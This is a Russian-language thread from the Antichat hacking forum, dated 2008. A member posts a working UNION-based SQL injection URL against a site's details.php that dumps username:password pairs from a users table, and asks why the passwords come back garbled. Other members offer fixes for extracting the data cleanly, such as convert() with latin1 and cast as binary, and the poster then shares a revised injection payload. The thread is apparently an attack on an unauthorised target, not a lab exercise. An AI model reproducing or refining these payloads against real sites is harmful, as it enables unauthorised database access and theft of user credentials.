Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
абра-кадабра в паролях пользователей |
26.05.2008, 13:45
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
абра-кадабра в паролях пользователей
Доброго дня античатовцы.
Вопрос следующий: на сайте нашел скуль, разделался с ней как написано в учебниках, в результате получил такую инъекцию
site.com/details.php?id=-5'+union+select+1,concat(username,char(58),passwor d),3+from+users_m_t+limit+10,1/*
по идеи должны вываливаться пары логин:пароль, но тут облом вышел, получаю вот что
shilpa:^��f�
patelph1:g�r1�n ну и т.д...
Что это за каракули в паролях?
Думал дело в кодировке, но смена не помогла.
|
|
|
26.05.2008, 14:20
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Посмотри в какой кодировке тебе отдаётся страница... Проблема как раз в кодировке, возможно это можно обойти с помощью Convert... Без ссылки не могу сказать более точно...
|
|
|
|
26.05.2008, 14:21
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
либо покоцаные, либо кодировка не та, либо попробуй using latin1 и т.п.
|
|
|
|
26.05.2008, 14:39
|
|
Banned
Регистрация: 15.01.2008
Сообщений: 63
Провел на форуме:
399884
Репутация:
46
|
|
Пассы просто захешированы. Походу не в мд5, а в чем то другом.
|
|
|
|
26.05.2008, 14:50
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
Сообщение от WeddRRRyss
Пассы просто захешированы. Походу не в мд5, а в чем то другом.
Это не хеш!Имхо это кодировка !
|
|
|
|
26.05.2008, 14:52
|
|
Banned
Регистрация: 15.01.2008
Сообщений: 63
Провел на форуме:
399884
Репутация:
46
|
|
Сообщение от S00pY
Это не хеш!Имхо это кодировка !
Если кодировка, то еще проще. не придется брутить. Главное понять в чем закодированны пасс.
|
|
|
|
26.05.2008, 14:56
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
встречался однажды с такой херью
попробуй поюзать convert()
|
|
|
|
26.05.2008, 15:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
мне обычно помогает cast( ... as binary)
|
|
|
|
26.05.2008, 16:53
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от $n@ke
либо покоцаные, либо кодировка не та, либо попробуй using latin1 и т.п.
попробовал вот так
http://site.com/details.php?id=-5'+union+select+1,concat(username,char(58),convert (password+using+latin1)),3+from+users_m_t+limit+10 ,1/*
те же каракули
при использовании cast (... as binary) тоже ничего хорошего.
Последний раз редактировалось mr.celt; 26.05.2008 в 17:35..
|
|
|
|
26.05.2008, 18:41
|
|
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037
Репутация:
73
|
|
в какой кодировке сама страница?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
